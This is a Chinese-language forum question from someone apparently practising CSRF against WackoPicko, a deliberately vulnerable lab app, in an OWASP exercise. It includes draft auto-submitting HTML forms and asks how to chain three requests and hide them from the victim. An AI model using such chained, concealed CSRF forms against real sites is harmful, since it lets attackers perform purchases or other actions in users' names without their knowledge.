我正在研究一个项目(owasp),在模拟CSRF攻击时需要帮助
我正在开发一个购物网站,我想按一下此处的操作,一键自动化:
1-(第一页),当用户单击“提交”按钮时,他进入第二页,并自动填写表格,
2-然后选择了第二页中的照片(购物车)(重定向到第三页)
3-在第三页中,另一种表单提交并将用户重定向到下一页。
另一个问题: 有什么办法可以隐藏所有动作?因此,当用户在第一页上提交表单时,他将无法看到下一页以及后台的所有进程?
//第一页
<script>history.pushState('', '', '/')<script>
<form action="http://192.168.2.14/WackoPicko/pictures/recent.php" method="GET">
<input type="submit" value="Submit"/>
//第二页-选择一个链接(购物车)
http://192.168.2.14/WackoPicko/pictures/view.php?picid=13
//第三页-自动提交另一张表格
<script> history.pushState('', '', '/')<script>
<form action="http://192.168.2.14/WackoPicko/pictures/view.php">
<input type="hidden" name="picid" value="10" />
<input type="submit" value="Submit request" />
</form>